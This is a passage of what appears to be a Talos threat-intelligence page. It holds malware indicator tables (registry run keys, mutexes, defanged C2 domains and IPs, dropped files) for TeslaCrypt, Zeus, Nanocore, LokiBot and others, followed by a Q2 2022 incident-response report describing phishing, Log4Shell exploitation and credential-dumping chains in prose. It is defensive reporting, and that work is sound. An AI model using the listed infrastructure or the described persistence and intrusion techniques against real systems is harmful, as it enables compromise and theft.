<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100, Value Name: CheckSetting | 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102, Value Name: CheckSetting | 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104, Value Name: CheckSetting | 25
<HKLM>\SOFTWARE\WOW6432NODE\XVYG, Value Name: svdjlvs | 25
<HKCU>\SOFTWARE\XVYG, Value Name: svdjlvs | 25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: fcbburq | 25
Mutexes Occurrences
EA4EC370D1E573DA 25
A83BAA13F950654C 25
Global\7A7146875A8CDE1E 25
B3E8F6F86CDD9D8B 25
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
apps[.]identrust[.]com 1
reflex-demo-use-4[.]hannover-re[.]cloud 1
flyttstadning-stockholm[.]nu 1
Files and or directories created Occurrences
%LOCALAPPDATA%\4dd3cc 25
%LOCALAPPDATA%\4dd3cc\519d0f.bat 25
%LOCALAPPDATA%\4dd3cc\8e9866.8ca9d79 25
%LOCALAPPDATA%\4dd3cc\d95adb.lnk 25
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\91b4e5.lnk 25
%APPDATA%\b08d66 25
%APPDATA%\b08d66\0b3c0b.8ca9d79 25
%TEMP%\VB<random, matching [A-F0-9]{3,4}>.tmp 25

File Hashes

*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Ransomware.TeslaCrypt-9957356-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLinkedConnections
25
<HKCU>\SOFTWARE\XXXSYS 25
<HKCU>\SOFTWARE\XXXSYS
Value Name: ID
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
Value Name: CheckSetting
25
<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'> 24
<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'>
Value Name: data
24
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hdtjbroygvvb
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: owvhajogulen
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: pyfepfifrjwi
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: xbmnkkfnowvh
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: gulenopvybnq
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: tbqdqvojagik
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hajogulenopv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: mgtbqdqvcoqj
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ulenopvybnqj
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: lpyfepfifrjw
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: epfifrjwiqou
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ifrjwiqouteu
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: teumgtbqdqvo
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: nrxbmnkkfnow
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: whmtlmoxvcsc
1
<HKCU>\SOFTWARE\159643D83772F 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: bmnkkfnowvha
1
<HKCU>\SOFTWARE\159643D83772F
Value Name: data
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: vcscusnnmyjx
1
Mutexes Occurrences
ityeofm9234-23423 25
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
107[.]6[.]161[.]162 25
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
jessforkicks[.]com 25
heizhuangym[.]com 25
infotlogomas[.]malangkota[.]go[.]id 25
csucanuevo[.]csuca[.]org 25
snibi[.]se 25
danecobain[.]com 25
www[.]danecobain[.]com 25
Files and or directories created Occurrences
%ProgramFiles%\7-Zip\Lang\ka.txt 25
%ProgramFiles%\7-Zip\Lang\kaa.txt 25
%ProgramFiles%\7-Zip\Lang\kab.txt 25
%ProgramFiles%\7-Zip\Lang\kk.txt 25
%ProgramFiles%\7-Zip\Lang\ko.txt 25
%ProgramFiles%\7-Zip\Lang\ku-ckb.txt 25
%ProgramFiles%\7-Zip\Lang\ku.txt 25
%ProgramFiles%\7-Zip\Lang\ky.txt 25
%ProgramFiles%\7-Zip\Lang\lij.txt 25
%ProgramFiles%\7-Zip\Lang\lt.txt 25
%ProgramFiles%\7-Zip\Lang\lv.txt 25
%ProgramFiles%\7-Zip\Lang\mk.txt 25
%ProgramFiles%\7-Zip\Lang\mn.txt 25
%ProgramFiles%\7-Zip\Lang\mng.txt 25
%ProgramFiles%\7-Zip\Lang\mng2.txt 25
%ProgramFiles%\7-Zip\Lang\mr.txt 25
%ProgramFiles%\7-Zip\Lang\ms.txt 25
%ProgramFiles%\7-Zip\Lang\nb.txt 25
%ProgramFiles%\7-Zip\Lang\ne.txt 25
%ProgramFiles%\7-Zip\Lang\nl.txt 25
%ProgramFiles%\7-Zip\Lang\nn.txt 25
%ProgramFiles%\7-Zip\Lang\pa-in.txt 25
%ProgramFiles%\7-Zip\Lang\pl.txt 25
%ProgramFiles%\7-Zip\Lang\ps.txt 25
%ProgramFiles%\7-Zip\Lang\pt-br.txt 25
*See JSON for more IOCs

File Hashes


Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Dropper.Shiz-9957241-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT
Value Name: 67497551a
23
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: 98b68e3c
23
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: userinit
23
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: System
23
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: load
23
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: run
23
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: userinit
23
Mutexes Occurrences
Global\674972E3a 23
Global\MicrosoftSysenterGate7 23
internal_wutex_0x000000e0 23
internal_wutex_0x0000038c 23
internal_wutex_0x<random, matching [0-9a-f]{8}> 23
internal_wutex_0x00000448 22
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
*See JSON for more IOCs
Files and or directories created Occurrences
%TEMP%\<random, matching [A-F0-9]{1,4}>.tmp 23

File Hashes

*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Dropper.Zeus-9957126-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PRIVACY
Value Name: CleanCookies
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\XODYUZ 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Savyomzauc
1
<HKCU>\SOFTWARE\MICROSOFT\XODYUZ
Value Name: Seroymo
1
Mutexes Occurrences
GLOBAL\{<random GUID>} 1
Local\{<random GUID>} 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
199[.]2[.]137[.]201 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
wearesofamousthatwestayontop[.]com 1
sunobowttteek2[.]biz 1
Files and or directories created Occurrences
%TEMP%\tmp8f23b8f6.bat 1
%APPDATA%\Axfo 1
%APPDATA%\Axfo\ycner.elz 1
%APPDATA%\Ebyhvo 1
%APPDATA%\Ebyhvo\feyn.exe 1
%APPDATA%\Iqxa 1
%APPDATA%\Iqxa\oviku.ibc 1

File Hashes

*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Dropper.Tofsee-9957067-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 17 samples
Registry Keys Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config4
4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config3
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: DisplayName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: WOW64
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: ObjectName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: Description
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\nxzuqihd
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: DisplayName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: WOW64
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: ObjectName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: Description
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\eoqlhzyu
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TDFAWONJ 1
Mutexes Occurrences
Global\07ada3c1-08f4-11ed-b5f8-00501e3ae7b6 1
Global\067cf3c1-08f4-11ed-b5f8-00501e3ae7b6 1
Global\08e8d341-08f4-11ed-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
*See JSON for more IOCs
Files and or directories created Occurrences
%SystemRoot%\SysWOW64\config\systemprofile 4
%SystemRoot%\SysWOW64\config\systemprofile:.repos 4
%SystemRoot%\SysWOW64\nxzuqihd 1
%SystemRoot%\SysWOW64\eoqlhzyu 1
%SystemRoot%\SysWOW64\tdfawonj 1
%SystemRoot%\SysWOW64\hrtokcbx 1
%TEMP%\oacsevkh.exe 1
%TEMP%\htrzurov.exe 1
%TEMP%\rzwntxyj.exe 1
%TEMP%\mcilsztg.exe 1

File Hashes


Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Packed.Nanocore-9957022-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 10 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\WINRAR SFX
Value Name: C%%Users%ADMINI~1%AppData%Local%Temp
9
<HKCU>\SOFTWARE\WINRAR SFX 9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: AGP Manager
4
<HKCU>\SOFTWARE\7E3975E4EF230D7D9195 2
<HKCU>\SOFTWARE\7E3975E4EF230D7D9195
Value Name: 7E3975E4EF230D7D9195
2
Mutexes Occurrences
Global\{8c60c66e-3013-47af-8bbe-7df02dd28d12} 4
Global\Protect7d723a8e.dll 2
Global\11971d21-08aa-11ed-b5f8-00501e3ae7b6 1
Global\15c3b7a1-08aa-11ed-b5f8-00501e3ae7b6 1
Global\1bb73741-08aa-11ed-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
74[.]139[.]80[.]187 6
145[.]14[.]144[.]94 1
145[.]14[.]144[.]171 1
145[.]14[.]145[.]198 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
wirelock[.]000webhostapp[.]com 3
Files and or directories created Occurrences
%TEMP%\RarSFX1 10
%TEMP%\RarSFX0 10
%TEMP%\RarSFX2 5
%ProgramFiles(x86)%\AGP Manager 4
%ProgramFiles(x86)%\AGP Manager\agpmgr.exe 4
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5 4
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs 4
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator 4
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat 4
%TEMP%\RarSFX3 3
%TEMP%\RarSFX1\BouncyCastle.Crypto.dll 3
%TEMP%\RarSFX1\Google.Protobuf.dll 3
%TEMP%\RarSFX1\JLibrary.dll 3
%TEMP%\RarSFX1\MySql.Data.dll 3
%TEMP%\RarSFX1\Newtonsoft.Json.dll 3
%TEMP%\RarSFX1\Renci.SshNet.dll 3
%TEMP%\RarSFX1\Ubiety.Dns.Core.dll 3
%TEMP%\RarSFX0\Release.exe 3
%TEMP%\RarSFX1\VACBypass.exe 3
%TEMP%\RarSFX0\VACBypass.sfx.exe 3
%TEMP%\RarSFX1\ProcessInjector.dll 2
%TEMP%\RarSFX1\Venge.exe 2
%TEMP%\Protect7d723a8e.dll 2
%APPDATA%\MSConfig.exe 2
%System32%\Tasks\'MSConfig' 2
*See JSON for more IOCs

File Hashes


Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Dropper.LokiBot-9957019-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Mutexes Occurrences
3749282D282E1E80C56CAE5A 7
uoXVcKrtOqoPVAWBhQA 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
198[.]187[.]30[.]47 4
193[.]122[.]130[.]0 2
132[.]226[.]247[.]73 2
158[.]101[.]44[.]242 2
37[.]0[.]11[.]227 1
45[.]133[.]1[.]20 1
47[.]88[.]22[.]122 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
checkip[.]dyndns[.]org 6
sempersim[.]su 1
Files and or directories created Occurrences
%APPDATA%\D282E1 7
%APPDATA%\D282E1\1E80C5.lck 7
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5 7
%System32%\Tasks\Updates 1
%TEMP%\tmp4B83.tmp 1
%APPDATA%\VQJJRC.exe 1
%System32%\Tasks\Updates\VQJJRC 1

File Hashes


Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Quarterly Report: Incident Response Trends in Q2 2022

26 July 2022 at 14:03

Commodity malware usage surpasses ransomware by narrow margin

For the first time in more than a year, ransomware was not the top threat Cisco Talos Incident Response (CTIR) responded to this quarter, as commodity malware surpassed ransomware by a narrow margin. This is likely due to several factors, including the closure of several ransomware groups, whether of their own volition or as a result of the actions of global law enforcement agencies and governments.

Commodity malware was the top observed threat this quarter, a notable development given the general decrease in observations of attacks leveraging commodity trojans in CTIR engagements since 2020. These developments coincide with a general resurgence of certain email-based trojans in recent months, as law enforcement and technology companies have continued to attempt to disrupt email-based malware threats like Emotet and Trickbot. This quarter featured malware such as the Remcos remote access trojan (RAT), Vidar infostealer, Redline Stealer and Qakbot (Qbot), a well-known banking trojan that, in recent weeks, has been observed in new clusters of activity delivering a variety of payloads.

Targeting

The top-targeted vertical continues to be telecommunications, following a trend where it was among the top targeted verticals in Q4 2021 and Q1 2022, closely followed by organizations in the education and health care sectors.

Commodity malware

This quarter saw a notable increase in commodity malware threats compared to previous quarters. Commodity malware is widely available for purchase or free download, is typically not customized and is used by a variety of threat actors in various stages of their operations and/or to deliver additional threats, including many of the ransomware variants referenced below.

In one engagement affecting a U.S. medical facility, CTIR identified a malicious Microsoft Excel file (XLS) disseminated via phishing emails delivering a variant of the Remcos RAT. Active since at least 2016, Remcos records keyboard and audio inputs, captures screenshots, gathers clipboard data and much more. CTIR identified remote network connections using a systems administrator account just prior to the suspected timeframe. The aforementioned XLS contains Visual Basic code that executes once a user opens the file and enables macros. We identified an IP address, 209.127.19[.]101, within a PowerShell command that would eventually download the next stages of the infection from URLs hosted on that IP. In March 2022, this same IP address was also reported as associated with a Remcos RAT phishing campaign, suggesting CTIR was seeing an extension of this activity, which uses lures to entice users to open a malicious XLS file that allegedly contains confidential information.

In recent weeks, Talos observed ongoing Qakbot activity leveraging thread hijacking, a method by which threat actors use compromised email accounts to insert malicious replies into the middle of an existing email conversation. In an engagement affecting a U.S. local government, CTIR investigated three waves of phishing emails that, upon user execution, subsequently delivered the Qakbot banking trojan. All three waves of emails were constructed in two different ways: purely spoofed content using fake emails related to tax documents, and a blend of thread hijacking leveraging spoofed and legitimate email body content designed to appear to be a reply to an ongoing email conversation. CTIR noted that the legitimate content appeared to be primarily harvested from emails sent to external recipients in 2020 and 2021, which we’ll discuss in a forthcoming post. The legitimate content was partially scrubbed to remove certain email addresses within the text of the previous email messages, although at this time, the reason for this is unknown. While investigating the affected system, CTIR found that once the user clicked on the malicious link, a ZIP file was downloaded to the following directory, “C:/Users/<user>/Downloads”. The ZIP contained a Windows shortcut (LNK) file whose contents included a command intended to create a directory under the user profile and attempt to contact a C2 domain (bottlenuts[.]com) to retrieve a file and execute it using the Windows utility “regsvr32.exe”. While the Qakbot payload was not executed by the end user, the command line arguments and C2 domain are consistent with a recent publicly reported Qakbot campaign, suggesting that this is part of the same activity.

CTIR observed information stealers in two engagements this quarter; in both incidents, MFA was not properly applied across the organization and its third parties. In one engagement, CTIR identified the Vidar information stealer affecting a telecommunications company based in the Philippines. First identified in 2018, Vidar is typically installed through spam emails, adware and potentially unwanted programs (PUPs). In this case, CTIR could not determine the initial access vector due to a lack of logging. However, the affected organization reported that the compromised victim did not have proper MFA applied.

In a similar series of events, in a Redline Stealer engagement, CTIR investigated widespread adversary authentication through MFA into the victim’s O365, Workday and Citrix VDI environments. The adversary authentication followed two successful phishing attacks designed to collect usernames, passwords and up to two hashed one-time passcodes (HOTPs). First discovered in 2020, the Redline Stealer is sold on Russian language forums and messaging platforms such as Telegram and has become increasingly popular in its role as a primary and/or secondary payload supplementing activity associated with other malware.


Ransomware 


Ransomware continued to be a top threat affecting Cisco customers. Of the ransomware engagements CTIR supported, this quarter featured previously seen high-profile ransomware-as-a-service (RaaS) variants, such as BlackCat (aka ALPHV) and Conti.

In a BlackCat ransomware engagement affecting a U.S. telecommunications organization, the ransomware was effectively blocked and did not execute in the environment. However, through the course of the incident, CTIR analyzed artifacts determined to be instances of Cobalt Strike with a Delphi loader capable of performing Mimikatz memory-dumping operations. CTIR observed two malicious domains that redirected to known Cobalt Strike IP addresses. Notably, one of the domains, standwithukraine[.]space, appears to be a reference to the ongoing Russia-Ukraine war. CTIR also detected numerous file downloads for Impacket’s Secretsdump module (“secretsdump.exe”), which performs various techniques to harvest credentials. While the appearance of the Delphi loader is not novel, BlackCat joins other ransomware groups, including REvil/Sodinokibi, that have been reported leveraging the Delphi loader to run a Cobalt Strike binary.




In a Conti ransomware incident affecting a health care organization with locations across the U.S., Europe and the Middle East, CTIR observed a Conti affiliate exploiting Log4Shell (CVE-2021-44228, CVE-2021-45046, and related vulnerabilities) on a vulnerable VMware Horizon server, consistent with public reporting on Conti leveraging Log4Shell from December 2021. After establishing initial access, CTIR observed Cobalt Strike beaconing, system enumeration and unauthorized installation of remote access tools such as AnyDesk. The adversary then established persistence with the unauthorized creation of a local admin account and attempted to escalate privileges by modifying security-enabled group settings, service installation, disabling user accounts, accessing Windows Vault credentials, and resetting user passwords. For lateral movement, the adversary connected to IPC$ network shares and accessed a compromised host via remote desktop protocol (RDP). As discussed in the previous quarter, Conti is among the many threat actor groups leveraging Log4Shell as a means of initial infection, and we will likely continue to see threat actors adopting this exploit into their tactics, techniques and procedures (TTPs).     

Interestingly, in May 2022, Conti first announced it was ceasing operations, and by June had taken much of its infrastructure offline, including Tor servers used to leak data and negotiate ransom payments with victims. While the effects of Conti shutting down are still unknown at this time, a relatively new RaaS variant dubbed “Black Basta” is suspected to be a re-brand of Conti, based on similarities in payment and leak sites and the communication styles of some of its members. Black Basta, while unseen in incident response engagements thus far, began operating in mid-April 2022 and is gaining notoriety by leveraging the aforementioned Qakbot banking trojan to move laterally on compromised devices.


Initial vectors


This quarter also featured several engagements where adversaries identified and/or exploited misconfigured public-facing applications. This includes active scanning, exploitation of public-facing routers and servers, and leveraging Log4Shell in vulnerable applications, such as VMware Horizon.



In one engagement, an IT company with operations in Europe had a misconfigured and accidentally exposed Azure server. An adversary had attempted to remotely access the system before it was isolated. The system was alone in its subnet but connected to other internal resources via an IPsec tunnel, a common protocol used to establish VPN connections. Analysis identified multiple failed login and brute force attempts from various external IP addresses, highlighting the need to patch and limit exposure to prevent unwanted traffic from reaching the application.


Security weaknesses


The lack of MFA remains one of the biggest impediments to enterprise security. In at least two engagements this quarter, the affected organization’s partner or third party did not have MFA enabled, allowing the adversary to gain access and authenticate into the environment. CTIR recommends that organizations ensure all third parties in the environment are following MFA security policies and guidelines.

In the Remcos RAT engagement, CTIR identified that domain users had local administrator rights across the environment. This makes it easier for an adversary to exploit Active Directory and move laterally around the network.


Top-observed MITRE ATT&CK techniques


Below is a list of the MITRE ATT&CK techniques observed in this quarter’s IR engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. The table below represents the techniques used with a relevant example, and the approximate number of times seen. However, it is not an exhaustive list.

Key findings from the MITRE ATT&CK appendix include:
  • Adversaries leveraged valid accounts, achieved via techniques such as brute force, for initial access and persistence in several engagements this quarter.
  • In line with last quarter, we continue to observe email-based threats leveraging a variety of social engineering techniques to entice users to click or execute a given link or file.
  • We continue to see a variety of threats identify or exploit misconfigured or unpatched and vulnerable public-facing applications.
  • Attackers use multiple techniques associated with credential harvesting tools and utilities, such as Mimikatz and Impacket, to obtain account and password information. The observed collection techniques exhibited the actors’ interest in specific information, including collecting details from Active Directory to harvest credential information about domain members.

| Tactic | Technique | Example |
| --- | --- | --- |
| Initial Access (TA0001) | T1190 Exploit Public-Facing Application | Attackers successfully exploited a vulnerable application that was publicly exposed to the Internet. |
| Reconnaissance (TA0043) | T1592 Gather Victim Host Information | Malicious file contains details about host |
| Persistence (TA0003) | T1053 Scheduled Task/Job | Scheduled tasks were created on a compromised server |
| Execution (TA0002) | T1059.001 Command and Scripting Interpreter: PowerShell | Executes PowerShell code to retrieve information about the client's Active Directory environment |
| Discovery (TA0007) | T1087 Account Discovery | Use a utility like ADRecon to enumerate information on users and groups |
| Credential Access (TA0006) | T1003.001 OS Credential Dumping: LSASS Memory | Use “lsass.exe” for stealing password hashes from memory |
| Privilege Escalation (TA0004) | T1574.002 Hijack Execution Flow: DLL Side-Loading | A malicious PowerShell script attempted to side-load a DLL into memory |
| Lateral Movement (TA0008) | T1021.001 Remote Desktop Protocol | Adversary made attempts to move laterally using Windows Remote Desktop |
| Defense Evasion (TA0005) | T1027 Obfuscated Files or Information | Use base64-encoded PowerShell scripts |
| Command and Control (TA0011) | T1219 Remote Access Software | Remote access tools found on the compromised system |
| Impact (TA0040) | T1486 Data Encrypted for Impact | Deploy Conti ransomware and encrypt critical systems |
| Exfiltration (TA0010) | T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage | Actor exfiltrated data to file sharing site mega[.]nz |
| Collection (TA0009) | T1114.003 Email Collection: Email Forwarding Rule | Adversary used a compromised account to create a new inbox rule to place emails in a folder |
| Software/Tool | S0029 PsExec | Adversary made use of PsExec for lateral movement |

What Talos Incident Response learned from a recent Qakbot attack hijacking old email threads

27 July 2022 at 12:00



By Nate Pors and Terryn Valikodath.  

Executive summary 

  • In a recent malspam campaign delivering the Qakbot banking trojan, Cisco Talos Incident Response (CTIR) observed the adversary using aggregated, old email threads from multiple organizations that we assess were likely harvested during the 2021 ProxyLogon-related compromises targeting vulnerable Microsoft Exchange servers. 
  • This campaign relies on external thread hijacking, whereby the adversary is likely using a bulk aggregation of multiple organizations’ harvested emails to launch focused phishing campaigns against previously uncompromised organizations. This differs from the more common approach to thread hijacking, in which attackers use a single compromised organization’s emails to deliver their threat. 
  • This many-to-one approach is unique from what we have generally observed in the past and is likely an indirect effect of the widespread compromises and exfiltration of large volumes of email from 2020 and 2021. 
  • Understanding the difference between external and single-victim thread hijacking is essential for detecting these threats. Below, we have several tips for defenders on how to identify key indicators of this activity. 

External thread hijacking  

